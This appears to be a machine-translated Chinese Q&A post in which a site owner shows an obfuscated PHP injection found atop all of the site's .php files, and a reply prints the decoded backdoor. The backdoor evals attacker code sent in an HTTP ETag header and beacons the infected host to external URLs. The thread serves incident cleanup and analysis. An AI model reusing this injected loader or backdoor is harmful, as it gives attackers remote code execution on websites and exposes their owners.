我的网站根本不工作,我注意到有人把这个字符串放在所有.php文件的顶部:
<?php /* b9cb27b481275ee07e304fa452b06754b499b5bf */ $u="p"."r"."e"."g"."_"."rep"."l"."ac"."e";$z="gzunc"."om"."press";$m="bas"."e"."64"."_dec"."ode";$u("/x"."wab"."z5/e",$z($m("eNrNVW"."1Po0AQ/"."i8mTfSDBLcslNwnrWj"."P86q2WHOfmgWGlpMuuEBr/737AnSx1XiX"."+3AJ"."Jcu8PDPz"."zMwW1iQ"."9ZmRTsTSCMIvg+CiuaFgmGe0hc3x+97S+zfmphwY9ZNFievv03ENDKbEe0qqHXHF2LmrJ02wkTv1L/iaMka10dHt9YRBnrIVKtjfcylSK5nuIsN2RoAv57MfAF7UFvmzjNSjSzqkl"."/mS8bC3Mf5l"."HB1"."mBNSL0SapSl7Gow2hrIwwwfxclS4F2WXclglun"."Ic30PE"."c"."/t7TUydiL3v"."8CgzudLO"."agV6P"."R3FTwLvV1PTrzHzSEi/P1VaUBIvHs"."NWtcbfJ"."Ot5RgqLNVD2XH4lD79O"."x2o9A06Owjlv+q6/95w1r2jR0q"."Z1G6Sv6UK/b4O1yym"."ucGffDZoB9O"."o8"."uHkmizw6CsG"."NUy03R"."JrHhPigJKFXw+9"."SYzb"."yJjO"."CPfv597/vk1P7exCI0U2iL9MWtZg"."Nc8"."5TceB2"."lvPwmIZOpIuoqbLiAF2Na8tS"."iqgA/cV2ILb9ys7"."C4ReTHOi"."2"."US1xW"."otNw6s2YFLOIS"."jL"."Dp9B0X2xa2Y4DAN"."JHjBpFtAsAgCAAHuMnVjBKRHvArXRC0+lp1enhX35xoFc+S7MBtj"."pZlyb"."fuvIeu+LMm"."eZHQKCFGxhb823jeBO"."RF6pCM0DUPGZAyoYslyfOEQ"."lEYCRVei"."zKvyg+9IC5PeZgwS7NFQk6BAltAmYTECLOVETAZ9/fmJW8Q6jKKZRXHqSq8"."Lagp0TLjJIU5B5qHGS2BlgU3VM3Js/y9k2QrJmkB6shn"."AMhKub5yCFEYNAAaUeI"."i4031NPkKymUWtRp+uPb8XeVAImC61vPJQnJhbm/80S8uMeqhBFo3tv2rFviN"."VdNhtLqf"."jDdiw3EoBtpFoOR7MFxmn5FggELXsSNrgOEs6AcBQY7VN8FyosC2ohBh7MY1Qif"."wH41sPX37KzS6m/pqhYz3+on38OhN/fnj5Lu24PVjCFg"."8ZPxHmxHfTfXR"."ycm3N+BnRcY=")),"/x"."wabz5/"."e"); /* f9d4b9453f919477fd0a13c96fe26367485b9689 */ ?>
这是什么?
现在我正在使用命令“grep”来查找所有受感染的文件,但我不确定是否能够让我的网站再次运行,只能从.php文件中删除这些字符串。
答案 0 :(得分:1)
FWIW,以下代码似乎是eval'd,可能在此过程中犯了一个错误。邪恶,但令人着迷。似乎与HTTP ETag有关。
function NAOWvLp ($nsSLWk, $Qlu) {
$QWVH = array();
for ($iyJ=0; $iyJ<256; $iyJ++) {
$QWVH[$iyJ] = $iyJ;
}
$TRNh = 0;
for ($iyJ=0; $iyJ<256; $iyJ++) {
$TRNh = ($TRNh + $QWVH[$iyJ] + ord($nsSLWk[$iyJ % strlen($nsSLWk)])) % 256;
$HMynt = $QWVH[$iyJ];
$QWVH[$iyJ] = $QWVH[$TRNh];
$QWVH[$TRNh] = $HMynt;
}
$iyJ = 0;
$TRNh = 0;
$pvFu = "";
for ($Nuwp=0; $Nuwp<strlen($Qlu); $Nuwp++) {
$iyJ = ($iyJ + 1) % 256;
$TRNh = ($TRNh + $QWVH[$iyJ]) % 256;
$HMynt = $QWVH[$iyJ];
$QWVH[$iyJ] = $QWVH[$TRNh];
$QWVH[$TRNh] = $HMynt;
$pvFu .= $Qlu[$Nuwp] ^ chr($QWVH[($QWVH[$iyJ] + $QWVH[$TRNh]) % 256]);
}
return $pvFu;
}
if (isset($_SERVER['HTTP_ETAG']) and
$glKV = explode(urldecode("+"), base64_decode(substr($_SERVER['HTTP_ETAG'], 5))) and
array_shift($glKV) == "4a9a5250737956456feeb00279bd60eee8bbe5b5") {
die(eval(implode(urldecode("+"), $glKV)));
$dmfVio = array("http://vapsindia.org/.kwbaq/","http://creatinghappiness.in/.gtput/","http://eft-psicologia-energetica.com.br/.kjwqp/");
shuffle($dmfVio);
@file_get_contents(
array_pop($dmfVio),
false,
stream_context_create(
array(
"http"=>array(
"method"=>"GET",
"header"=>"ETag: yJTHY"
.base64_encode(
NAOWvLp(
"yJTHY",
"mPRNwu 5c b92e "
.base64_encode(
"61ab82c976d485e1b3bba27430e47db64dc2559f "
.NAOWvLp(
"4a9a5250737956456feeb00279bd60eee8bbe5b5",
$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']
)
)
)
)."\r\n"
)
)
)
);
}